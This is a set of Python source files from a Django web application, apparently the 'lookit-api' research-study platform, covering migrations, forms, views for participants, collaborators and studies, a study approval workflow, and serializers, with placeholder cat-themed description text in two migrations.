models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('created_at', models.DateTimeField(auto_now_add=True)),\n ('action', models.CharField(choices=[('started', 'Started'), ('paused', 'Paused'), ('abandoned', 'Abandoned'), ('finished', 'Finished')], max_length=128)),\n ('response', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='studies.Response')),\n ('user', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='Study',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=255)),\n ('is_active', models.BooleanField(default=True)),\n ('blocks', project.fields.datetime_aware_jsonfield.DateTimeAwareJSONField(default=dict)),\n ('organization', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, related_name='studies', related_query_name='study', to='accounts.Organization')),\n ],\n options={\n 'permissions': (('view_study', 'View Study'), ('edit_study', 'Edit Study'), ('can_respond', 'Can Respond?')),\n },\n ),\n migrations.CreateModel(\n name='StudyLog',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('created_at', models.DateTimeField(auto_now_add=True)),\n ('action', models.CharField(choices=[('created', 'Created'), ('submitted', 'Submitted for Approval'), ('rejected', 'Rejected'), ('approved', 'Approved'), ('started', 'Started'), ('paused', 'Paused'), ('resumed', 'Resumed'), ('deactivated', 'Deactivated'), ('retracted', 'Retracted'), ('viewed_data', 'Viewed Data')], max_length=128)),\n ('study', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='studies.Study')),\n ('user', 
models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.AddField(\n model_name='response',\n name='study',\n field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='studies.Study'),\n ),\n ]\n" }, { "alpha_fraction": 0.5793742537498474, "alphanum_fraction": 0.6176129579544067, "avg_line_length": 33.52000045776367, "blob_id": "5cfe052a3e7ac1b3d01c067b1cf5f5eef456a670", "content_id": "29f5029f47b547014bc2fc947393d8104bbc07b5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 863, "license_type": "permissive", "max_line_length": 292, "num_lines": 25, "path": "/accounts/migrations/0006_auto_20170505_0004.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11 on 2017-05-05 00:04\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport uuid\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accounts', '0005_auto_20170428_1814'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='organization',\n options={'permissions': (('is_admin', 'Organization Administrator'), ('can_add_collaborators', 'Can Add Collaborators'), ('can_approve_studies', 'Can Approve Studies'), ('can_disable_studies', 'Can Disable Studies'), ('can_view', 'Can View'), ('can_add_study', 'Can Add Study'))},\n ),\n migrations.AddField(\n model_name='user',\n name='uuid',\n field=models.UUIDField(default=uuid.uuid4, verbose_name='identifier'),\n ),\n ]\n" }, { "alpha_fraction": 0.6109133958816528, "alphanum_fraction": 0.6251482963562012, "avg_line_length": 29.10714340209961, "blob_id": "3e6af4d3666e17cd22f6029818c105cdf7072372", "content_id": "f50163d69436f946a1e29d82057d901c1e938d7d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 843, "license_type": "permissive", "max_line_length": 168, "num_lines": 28, "path": "/studies/forms.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "from ace_overlay.widgets import AceOverlayWidget\nfrom django import forms\n\nfrom studies.models import Response, Study\n\n\nclass ResponseForm(forms.ModelForm):\n results = forms.CharField(widget=AceOverlayWidget(mode='json', wordwrap=True, theme='textmate', width=\"100%\", height=\"100%\", showprintmargin=False), required=False)\n class Meta:\n fields = (\n 'study',\n 'participant',\n 'demographic_snapshot',\n 'results'\n )\n model = Response\n\n\nclass StudyForm(forms.ModelForm):\n blocks = forms.CharField(widget=AceOverlayWidget(mode='json', wordwrap=True, theme='textmate', width=\"100%\", height=\"100%\", showprintmargin=False), required=False)\n\n class Meta:\n fields = (\n 'name',\n 'organization',\n 'blocks'\n )\n model = Study\n" }, { "alpha_fraction": 0.6978743076324463, "alphanum_fraction": 0.6984995603561401, "avg_line_length": 37.54216766357422, "blob_id": "0d63d6257652b3fcc2bd6de6895460cac53fd18c", "content_id": "49185962d83dd6487345ab5b7533ea40e5969e37", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6398, "license_type": "permissive", "max_line_length": 157, "num_lines": 166, "path": "/exp/views/user.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "from django.shortcuts import reverse\nfrom django.views import generic\n\nfrom 
accounts.forms import UserStudiesForm\nfrom accounts.models import User\nfrom guardian.mixins import LoginRequiredMixin\nfrom guardian.shortcuts import get_objects_for_user\nfrom studies.models import Study, Response\n\n\nclass ParticipantListView(LoginRequiredMixin, generic.ListView):\n '''\n ParticipantListView shows a list of participants that have participated in studies\n related to organizations that the current user has permissions to.\n '''\n template_name = 'accounts/participant_list.html'\n queryset = User.objects.exclude(demographics__isnull=True)\n model = User\n\n def get_queryset(self):\n qs = super(ParticipantListView, self).get_queryset()\n return qs.filter(response__study__organization=self.request.user.organization)\n\n\nclass ParticipantDetailView(LoginRequiredMixin, generic.UpdateView):\n '''\n ParticipantDetailView shows information about a participant that has participated in studies\n related to organizations that the current user has permission to.\n '''\n queryset = User.objects.exclude(demographics__isnull=True).select_related('organization')\n fields = ('is_active', )\n template_name = 'accounts/participant_detail.html'\n model = User\n\n def get_queryset(self):\n qs = super(ParticipantDetailView, self).get_queryset()\n return qs.filter(response__study__organization=self.request.user.organization)\n\n def get_success_url(self):\n return reverse('exp:participant-detail', kwargs={'pk': self.object.id})\n\n\nclass ResponseListView(LoginRequiredMixin, generic.ListView):\n '''\n Displays a list of responses for studies that the current user can view.\n '''\n template_name = 'accounts/response_list.html'\n\n def get_queryset(self):\n studies = get_objects_for_user(self.request.user, 'studies.can_view')\n return Response.objects.filter(study__in=studies).order_by('study__name')\n\n\nclass ResponseDetailView(LoginRequiredMixin, generic.DetailView):\n '''\n Displays a response.\n '''\n template_name = 'accounts/response_detail.html'\n\n def get_queryset(self):\n studies = get_objects_for_user(self.request.user, 'studies.can_view')\n return Response.objects.filter(study__in=studies).order_by('study__name')\n\n\nclass CollaboratorListView(LoginRequiredMixin, generic.ListView):\n '''\n Displays a list of collaborators in the same organization as the current user. 
\n '''\n template_name = 'accounts/collaborator_list.html'\n queryset = User.objects.filter(demographics__isnull=True)\n model = User\n\n def get_queryset(self):\n qs = super(CollaboratorListView, self).get_queryset()\n # TODO this should probably use permissions eventually, just to be safe\n return qs.filter(organization=self.request.user.organization)\n\n\nclass CollaboratorDetailView(LoginRequiredMixin, generic.UpdateView):\n '''\n CollaboratorDetailView shows information about a collaborator and allows enabling or disabling\n a user.\n '''\n queryset = User.objects.filter(demographics__isnull=True)\n fields = ('is_active', )\n template_name = 'accounts/collaborator_detail.html'\n model = User\n\n def get_success_url(self):\n return reverse('exp:collaborator-detail', kwargs={'pk': self.object.id})\n\n def post(self, request, *args, **kwargs):\n retval = super(CollaboratorDetailView, self).post(request, *args, **kwargs)\n if 'enable' in self.request.POST:\n self.object.is_active = True\n elif 'disable' in self.request.POST:\n self.object.is_active = False\n self.object.save()\n return retval\n\n\nclass AssignCollaboratorStudies(LoginRequiredMixin, generic.UpdateView):\n '''\n AssignUserStudies lists studies available and let's someone assign permissions\n to users.\n '''\n template_name = 'accounts/assign_studies_form.html'\n queryset = User.objects.filter(demographics__isnull=True)\n form_class = UserStudiesForm\n\n def get_success_url(self):\n return reverse('exp:collaborator-list')\n\n def get_initial(self):\n permissions = ['studies.view_study', 'studies.edit_study']\n initial = super(AssignCollaboratorStudies, self).get_initial()\n initial['studies'] = get_objects_for_user(self.object, permissions)\n return initial\n\n def get_context_data(self, **kwargs):\n context = super(AssignCollaboratorStudies, self).get_context_data(**kwargs)\n # only show studies in their organization\n context['studies'] = Study.objects.filter(organization=context['user'].organization)\n return context\n\n\nclass CollaboratorCreateView(LoginRequiredMixin, generic.CreateView):\n '''\n UserCreateView creates a user. It forces is_active to True; is_superuser\n and is_staff to False; and sets a random 12 char password.\n\n TODO Eventually this should email the user at their username/email once they\n are saved.\n TODO It should set an unusable password, send them an email to a url with that password\n in it as a token, let them set their own password after clicking the link. 
It should\n definitely check to make sure it's an unusable password before it allows the reset.\n '''\n model = User\n template_name = 'accounts/collaborator_form.html'\n fields = (\n 'username',\n 'given_name',\n 'middle_name',\n 'family_name',\n 'is_active',\n 'is_staff',\n 'is_superuser',\n 'password'\n )\n\n def post(self, request, *args, **kwargs):\n # TODO put this on the view so that we can send the user an email once their user is saved\n # TODO alternatively send the password in a post_save signal under certain conditions\n self.user_password = User.objects.make_random_password(length=12)\n form = self.get_form()\n query_dict = form.data.copy()\n # implicitly add them to their creator's organization\n query_dict.update(is_active=True, is_superuser=False, is_staff=False, password=self.user_password, organization=self.request.user.organization)\n form.data = query_dict\n if form.is_valid():\n return self.form_valid(form)\n else:\n return self.form_invalid(form)\n\n def get_success_url(self):\n return reverse('exp:assign-studies', kwargs={'pk': self.object.id})\n" }, { "alpha_fraction": 0.6811245083808899, "alphanum_fraction": 0.6811245083808899, "avg_line_length": 32.64864730834961, "blob_id": "d216ef4bb04f49d8d8d550a36a86763a5bd54539", "content_id": "e99303ec70def8c5c89a302926df2b033980c364", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2490, "license_type": "permissive", "max_line_length": 128, "num_lines": 74, "path": "/exp/views/study.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "from django.http import HttpResponseRedirect\nfrom django.shortcuts import reverse\nfrom django.views import generic\n\nfrom guardian.mixins import LoginRequiredMixin\nfrom guardian.shortcuts import get_objects_for_user, get_perms\n\nfrom studies.forms import StudyForm\nfrom studies.models import Study\n\n\nclass StudyCreateView(LoginRequiredMixin, generic.CreateView):\n '''\n StudyCreateView allows a user to create a study and then redirects\n them to the detail view for that study.\n '''\n fields = ('name', 'organization', 'blocks', )\n model = Study\n\n def get_form_class(self):\n return StudyForm\n\n def get_success_url(self):\n return reverse('exp:study-detail', kwargs=dict(pk=self.object.id))\n\n\nclass StudyListView(LoginRequiredMixin, generic.ListView):\n '''\n StudyListView shows a list of studies that a user has permission to.\n '''\n model = Study\n\n def get_queryset(self, *args, **kwargs):\n return get_objects_for_user(self.request.user, 'studies.can_view')\n\n\n\nclass StudyDetailView(LoginRequiredMixin, generic.DetailView):\n '''\n StudyDetailView shows information about a study.\n '''\n template_name = 'studies/study_detail.html'\n model = Study\n\n def get_permitted_triggers(self, triggers):\n permitted_triggers = []\n organization_permissions = get_perms(self.request.user, self.object.organization)\n\n admin_triggers = ['reject', 'approve']\n\n for trigger in triggers:\n # remove autogenerated triggers\n if trigger.startswith('to_'):\n continue\n # remove triggers that people don't have permission to\n if not self.request.user.is_superuser or (trigger in admin_triggers and 'is_admin' not in organization_permissions):\n continue\n\n permitted_triggers.append(trigger)\n\n return permitted_triggers\n\n def post(self, *args, **kwargs):\n trigger = self.request.POST['trigger']\n object = self.get_object()\n if hasattr(object, trigger):\n # transition through workflow state\n getattr(object, 
trigger)(user=self.request.user)\n return HttpResponseRedirect(reverse('exp:study-detail', kwargs=dict(pk=object.pk)))\n\n def get_context_data(self, **kwargs):\n context = super(StudyDetailView, self).get_context_data(**kwargs)\n context['triggers'] = self.get_permitted_triggers(self.object.machine.get_triggers(self.object.state))\n return context\n" }, { "alpha_fraction": 0.6963383555412292, "alphanum_fraction": 0.7095959782600403, "avg_line_length": 59.92307662963867, "blob_id": "4d350335f3a8aa3c7600634179649ddbd63bea4a", "content_id": "305e9903de37835f102328f0bd13758a6070bbfa", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1584, "license_type": "permissive", "max_line_length": 990, "num_lines": 26, "path": "/studies/migrations/0008_auto_20170505_1602.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11 on 2017-05-05 16:02\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('studies', '0007_study_description'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='study',\n old_name='description',\n new_name='short_description',\n ),\n migrations.AddField(\n model_name='study',\n name='long_description',\n field=models.TextField(default=\"Hide head under blanket so no one can see plan steps for world domination for catch mouse and gave it as a present with tail in the air. Hunt by meowing loudly at 5am next to human slave food dispenser the dog smells bad, so favor packaging over toy. Pose purrfectly to show my beauty go into a room to decide you didn't want to be in there anyway russian blue so stretch hide at bottom of staircase to trip human asdflkjaertvlkjasntvkjn (sits on keyboard) shake treat bag. Kitty ipsum dolor sit amet, shed everywhere shed everywhere stretching attack your ankles chase the red dot, hairball run catnip eat the grass sniff chase after silly colored fish toys around the house immediately regret falling into bathtub or my left donut is missing, as is my right claws in your leg or why must they do that, chase red laser dot. 
Stand in front of the computer screen destroy couch as revenge so refuse to drink water except out of someone's glass.\"),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.5846154093742371, "alphanum_fraction": 0.6393162608146667, "avg_line_length": 26.85714340209961, "blob_id": "e47f8f488b2fdb41f476cc2e1d7e128201141e04", "content_id": "4d901d1b8828749afef0c9f5240c74738fc89678", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 585, "license_type": "permissive", "max_line_length": 152, "num_lines": 21, "path": "/studies/migrations/0005_auto_20170426_1741.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11 on 2017-04-26 17:41\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('studies', '0004_auto_20170425_1950'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='studylog',\n name='study',\n field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, related_name='logs', related_query_name='logs', to='studies.Study'),\n ),\n ]\n" }, { "alpha_fraction": 0.6849785447120667, "alphanum_fraction": 0.7124463319778442, "avg_line_length": 54.47618865966797, "blob_id": "77c15a8f540f28c44b2f9abe1d4940071b31b8f9", "content_id": "00e29a8f76c0d0ae214abfc9b97cf02c9039123f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1165, "license_type": "permissive", "max_line_length": 728, "num_lines": 21, "path": "/studies/migrations/0007_study_description.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11 on 2017-05-05 15:53\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('studies', '0006_auto_20170426_1949'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='study',\n name='description',\n field=models.TextField(default=\"Pooping rainbow while flying in a toasted bread costume in space licks your face catch mouse and gave it as a present or chase the pig around the house or hide when guests come over toy mouse squeak roll over. Run outside as soon as door open refuse to drink water except out of someone's glass. Destroy the blinds destroy the blinds yet going to catch the red dot today going to catch the red dot today. Tuxedo cats always looking dapper roll over and sun my belly paw at your fat belly, destroy the blinds stare at the wall, play with food and get confused by dust yet leave fur on owners clothes. Chase the pig around the house. 
Purr intrigued by the shower intently sniff hand.\"),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.555343508720398, "alphanum_fraction": 0.5954198241233826, "avg_line_length": 26.578947067260742, "blob_id": "90ea57e2fe88be42f1ded7300b5ef7ce818bd388", "content_id": "07dfb83e0e597c3b034ec1cacc26c9ea5c8b592e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 524, "license_type": "permissive", "max_line_length": 158, "num_lines": 19, "path": "/studies/migrations/0012_auto_20170509_1535.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.1 on 2017-05-09 15:35\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('studies', '0011_study_contact_info'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='study',\n options={'permissions': (('can_view', 'View Study'), ('can_edit', 'Edit Study'), ('can_submit', 'Submit Study'), ('can_respond', 'Can Respond'))},\n ),\n ]\n" }, { "alpha_fraction": 0.498036652803421, "alphanum_fraction": 0.498036652803421, "avg_line_length": 22.492307662963867, "blob_id": "6009b02b948f77b3a1e9f976dfc440f4bb40ae54", "content_id": "2463e3837e6c49fd8fc8b4afb55e50b511bf7514", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1528, "license_type": "permissive", "max_line_length": 79, "num_lines": 65, "path": "/studies/workflow.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "\nstates = [\n 'created',\n 'submitted',\n 'rejected',\n 'retracted',\n 'approved',\n 'active',\n 'paused',\n 'deactivated'\n]\n\nSTATE_CHOICES = tuple(\n (x, x.title()) for x in states\n)\n\ntransitions = [\n {\n 'trigger': 'submit',\n 'source': 'created',\n 'dest': 'submitted',\n 'after': 'notify_administrators_of_submission',\n },\n {\n 'trigger': 'approve',\n 'source': 'submitted',\n 'dest': 'approved',\n 'after': 'notify_submitter_of_approval',\n },\n {\n 'trigger': 'reject',\n 'source': ['submitted', 'approved', 'active', 'paused', 'deactivated'],\n 'dest': 'rejected',\n 'after': 'notify_submitter_of_rejection',\n },\n {\n 'trigger': 'retract',\n 'source': 'submitted',\n 'dest': 'retracted',\n 'after': 'notify_administrators_of_retraction',\n },\n {\n 'trigger': 'resubmit',\n 'source': 'rejected',\n 'dest': 'submitted',\n 'after': 'notify_administrators_of_submission'\n },\n {\n 'trigger': 'activate',\n 'source': ['approved','paused'],\n 'dest': 'active',\n 'after': 'notify_administrators_of_activation'\n },\n {\n 'trigger': 'pause',\n 'source': 'active',\n 'dest': 'paused',\n 'after': 'notify_administrators_of_pause',\n },\n {\n 'trigger': 'deactivate',\n 'source': ['active', 'paused'],\n 'dest': 'deactivated',\n 'after': 'notify_administrators_of_deactivation'\n },\n]\n" }, { "alpha_fraction": 0.5364526510238647, "alphanum_fraction": 0.5364526510238647, "avg_line_length": 26.02941131591797, "blob_id": "4b1303227313c8caac922f05e9a8038776819096", "content_id": "eb5bd56c02c2e440793980f128665ee77fa19703", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 919, "license_type": "permissive", "max_line_length": 61, "num_lines": 34, "path": "/accounts/serializers.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "from accounts.models import DemographicData, 
User\nfrom rest_framework_json_api import serializers\n\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = '__all__'\n\n\nclass DemographicDataSerializer(serializers.ModelSerializer):\n user = UserSerializer()\n class Meta:\n model = DemographicData\n fields = (\n 'user',\n 'number_of_children',\n 'child_birthdays',\n 'languages_spoken_at_home',\n 'number_of_guardians',\n 'number_of_guardians_explanation',\n 'race_identification',\n 'age',\n 'gender',\n 'education_level',\n 'spouse_education_level',\n 'annual_income',\n 'number_of_books',\n 'additional_comments',\n 'country',\n 'state',\n 'density',\n 'extra',\n )\n" } ]
21
dragon434/untitled
https://github.com/dragon434/untitled
0d2401c798299b24038f395820844d9149caffa7
07a6c5edd01ff84c02dfd979fa5fc8b84a30415a
69649a0f77c44140b7c8570c7b449e6179b37e48
refs/heads/master
2021-04-15T16:56:12.853596
2020-03-16T08:56:02
2020-03-16T08:56:02
126,658,595
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5513447523117065, "alphanum_fraction": 0.6039119958877563, "avg_line_length": 23.787878036499023, "blob_id": "c20790442d75c09f30b75df6254dfe58a85956d5", "content_id": "ae835f2f7b6a0bb58aface39404713327652a2b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 840, "license_type": "no_license", "max_line_length": 76, "num_lines": 33, "path": "/未定义项目练习/get_ip_info.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-07-02\n\n__author__ = '@jiawenlong'\n\nimport requests\nimport os\n\n\n# curl -s ipinfo.io/$(curl -s http://ipv4.icanhazip.com )\n\ndef get_ip_info(ip):\n r = requests.get(\"http://ip.taobao.com//service/getIpInfo.php?ip=\" + ip)\n info = r.json()[\"data\"]\n # print(info)\n print(\"IP:\", info[\"ip\"])\n print(\"国家:\", info[\"country\"])\n print(\"省份:\", info[\"region\"])\n print(\"城市:\", info[\"city\"])\n print(\"供应商:\", info['isp'])\n\n\nget_ip_info(requests.get(\"http://ipv4.icanhazip.com\").text.rstrip(\"\\r\\n\"))\nprint()\nget_ip_info(\"140.143.136.250\")\n# print()\n# get_ip_info(\"116.62.8.82\")\n# print()\n# get_ip_info(\"8.8.8.8\")\n# print(requests.get(\"http://ipinfo.io/60.190.99.37\").json())\n# print(type(requests.get(\"http://ipv4.icanhazip.com\").text))\n" }, { "alpha_fraction": 0.5051762461662292, "alphanum_fraction": 0.5313851237297058, "avg_line_length": 34.165897369384766, "blob_id": "d0af90bfc8ec536cf28681ddfdc7a1fbfd5cc0cb", "content_id": "af1a9a1a67549b8fc384c1ef7f64de2503aa01c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8765, "license_type": "no_license", "max_line_length": 410, "num_lines": 217, "path": "/未定义项目练习/select_mysql_to_execl.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-07-05\n\n__author__ = '@jiawenlong'\n\nimport pymysql, xlwt\nfrom datetime import datetime\nfrom datetime import timedelta\n\n\ndef export_excel(table_name, sql):\n conn = pymysql.connect(user=user, host=host, port=port, passwd=passwd, db=db, charset='utf8')\n cur = conn.cursor()\n cur.execute(sql)\n fileds = [filed[0] for filed in cur.description]\n all_data = cur.fetchall()\n # 写excel\n book = xlwt.Workbook()\n sheet = book.add_sheet('sheet1')\n for col, field in enumerate(fileds):\n sheet.write(0, col, field)\n\n # 从第一行开始写\n row = 1\n for data in all_data:\n for col, field in enumerate(data):\n sheet.write(row, col, field)\n row += 1\n book.save('%s.xls' % table_name)\n\n\ndef give_time():\n today = datetime.today()\n today_date = datetime.date(today) - timedelta(days=1)\n return str(today_date)\n\n\nif __name__ == \"__main__\":\n host = 'rm-bp1l97d3ioa1b9058.mysql.rds.aliyuncs.com'\n user = 'tom_read'\n passwd = 'System123456'\n db = 'tom_system'\n port = 3306\n sql = \"select case channel when 0 then '好升益' when 1 then '母婴' when 2 then '倍全' when 3 then '阳光物业' when 4 then '酒知己' end 租户,id 店铺id,name 店铺名称,FROM_UNIXTIME(creation_time/1000, '%Y-%m-%d %H:%i:%s') 店铺创建时间 from t_store where creation_time>=(UNIX_TIMESTAMP(DATE_FORMAT(now(), '%y%m%d'))-24*60*60)*1000 and creation_time<(UNIX_TIMESTAMP(DATE_FORMAT(now(), '%y%m%d')))*1000 order by channel,creation_time;\"\n Yesterday = give_time()\n execl_file = '/tmp/新开店铺信息_' + Yesterday\n export_excel(execl_file, sql)\n\n\n\n\n\n\n # # __Desc__ = 从数据库中导出数据到excel数据表中\n # import 
xlwt\n # import pymysql\n # from datetime import datetime\n # from datetime import timedelta\n #\n #\n # class MYSQL:\n # def __init__(self):\n # pass\n #\n # def __del__(self):\n # self._cursor.close()\n # self._connect.close()\n #\n # def connectDB(self):\n # \"\"\"\n # 连接数据库\n # :return:\n # \"\"\"\n # try:\n # self._connect = pymysql.Connect(\n # host='127.0.0.1',\n # port=3306,\n # user='tom_read',\n # passwd='System123456',\n # db='tom_system',\n # charset='utf8'\n # )\n #\n # return 0\n # except:\n # return -1\n #\n # def export(self, sqll, output_path):\n # self._cursor = self._connect.cursor()\n # count = self._cursor.execute(sqll)\n # # print(self._cursor.lastrowid)\n # print(count)\n # # 重置游标的位置\n # self._cursor.scroll(0, mode='absolute')\n # # 搜取所有结果\n # results = self._cursor.fetchall()\n #\n # # 获取MYSQL里面的数据字段名称\n # fields = self._cursor.description\n # workbook = xlwt.Workbook()\n #\n # # 注意: 在add_sheet时, 置参数cell_overwrite_ok=True, 可以覆盖原单元格中数据。\n # # cell_overwrite_ok默认为False, 覆盖的话, 会抛出异常.\n # sheet = workbook.add_sheet('tablename', cell_overwrite_ok=True)\n #\n # # 写上字段信息\n # for field in range(0, len(fields)):\n # sheet.write(0, field, fields[field][0])\n #\n # # 获取并写入数据段信息\n # row = 1\n # col = 0\n # for row in range(1,len(results)+1):\n # for col in range(0, len(fields)):\n # sheet.write(row, col, u'%s' % results[row-1][col])\n #\n # # 获取当前日期,得到一个datetime对象如:(2016, 8, 9, 23, 12, 23, 424000)\n # today = datetime.today()\n # # 将获取到的datetime对象仅取日期如:2016-8-9 Yesteday\n # today_date = datetime.date(today) - timedelta(days=1)\n #\n # workbook.save(output_path + str(today_date) + '.xls')\n #\n #\n # if __name__ == '__main__':\n # excel_path = '/Users/admin/Downloads/'\n # sql = \"select case channel when 0 then '好升益' when 1 then '母婴' when 2 then '倍全' when 3 then '阳光物业' when 4 then '酒知己' end 租户,id 店铺id,name 店铺名称,FROM_UNIXTIME(creation_time/1000, '%Y-%m-%d %H:%i:%s') 店铺创建时间 from t_store where creation_time>=(UNIX_TIMESTAMP(DATE_FORMAT(now(), '%y%m%d'))-24*60*60)*1000 and creation_time<(UNIX_TIMESTAMP(DATE_FORMAT(now(), '%y%m%d')))*1000 order by channel,creation_time;\"\n # mysql = MYSQL()\n # flag = mysql.connectDB()\n # if flag == -1:\n # print('数据库连接失败')\n # else:\n # print('数据库连接成功')\n # mysql.export(sql, excel_path)\n\n\n\n\n # ==================== 不同的方法\n\n\n # 以下是python2执行\n # import sys\n # import time\n # import xlwt\n # import MySQLdb\n # from datetime import datetime\n # from datetime import timedelta\n # import json\n #\n # # host = 'rm-bp1l97d3ioa1b9058.mysql.rds.aliyuncs.com'\n # host = '127.0.0.1'\n # user = 'tom_read'\n # passwd = 'System123456'\n # db = 'tom_system'\n # port = 3306\n # sql = \"select case channel when 0 then '好升益' when 1 then '母婴' when 2 then '倍全' when 3 then '阳光物业' when 4 then '酒知己' end 租户,id 店铺id,name 店铺名称,FROM_UNIXTIME(creation_time/1000, '%Y-%m-%d %H:%i:%s') 店铺创建时间 from t_store where creation_time>=(UNIX_TIMESTAMP(DATE_FORMAT(now(), '%y%m%d'))-24*60*60)*1000 and creation_time<(UNIX_TIMESTAMP(DATE_FORMAT(now(), '%y%m%d')))*1000 order by channel,creation_time;\"\n # # sql=\"select * from t_store limit 10;\"\n # table_head = ['租户', '店铺id', '店铺名称', '店铺创建时间']\n # excel_path = '/Users/admin/Downloads'\n #\n # def get_data(sql):\n # # 创建数据库连接.\n # conn = MySQLdb.connect(host, user, passwd, db, port, charset='utf8')\n # # 创建游标\n # cur = conn.cursor()\n # # 执行查询,\n # cur.execute(sql)\n # # 由于查询语句仅会返回受影响的记录条数并不会返回数据库中实际的值,所以此处需要fetchall()来获取所有内容。\n # result = cur.fetchall()\n # # 关闭游标\n # cur.close()\n # # 关闭数据库连接\n # conn.close\n # # 返给结果给函数调用者。\n # 
return result\n #\n #\n # def write_data_to_excel(name, sql):\n # # 将sql作为参数传递调用get_data并将结果赋值给result,(result为一个嵌套元组)\n # result = get_data(sql)\n # # print result\n # # 实例化一个Workbook()对象(即excel文件)\n # wbk = xlwt.Workbook()\n # # 新建一个名为Sheet1的excel sheet。此处的cell_overwrite_ok =True是为了能对同一个单元格重复操作。\n # sheet = wbk.add_sheet('Sheet1', cell_overwrite_ok=True)\n # # 获取当前日期,得到一个datetime对象如:(2016, 8, 9, 23, 12, 23, 424000)\n # today = datetime.today()\n # # print today\n # # 将获取到的datetime对象仅取日期如:2016-8-9 Yesteday\n # today_date = datetime.date(today) - timedelta(days=1)\n # # print today_date\n # # 遍历result中的没个元素。\n # for i in xrange(len(result)):\n # # 对result的每个子元素作遍历,\n # # print i,result[i]\n # for j in xrange(len(result[i])):\n # # 将每一行的每个元素按行号i,列号j,写入到excel中。\n # # print j,result[i][j]\n # # for i in xrange(len(['租户','店铺id','店铺名称','店铺创建时间'])):\n # # sheet.write(0,i,table_head[0][i])\n # # i+=1\n # sheet.write(i, j, result[i][j])\n # # 以传递的name+当前日期作为excel名称保存。\n # wbk.save(excel_path + name + str(today_date) + '.xls')\n #\n #\n # # 如果该文件不是被import,则执行下面代码。\n # if __name__ == '__main__':\n # # 定义一个字典,key为对应的数据类型也用作excel命名,value为查询语句\n # db_dict = {'新开店铺信息-': sql}\n # # 遍历字典每个元素的key和value。\n # for k, v in db_dict.items():\n # # 用字典的每个key和value调用write_data_to_excel函数。\n # write_data_to_excel(k, v)\n" }, { "alpha_fraction": 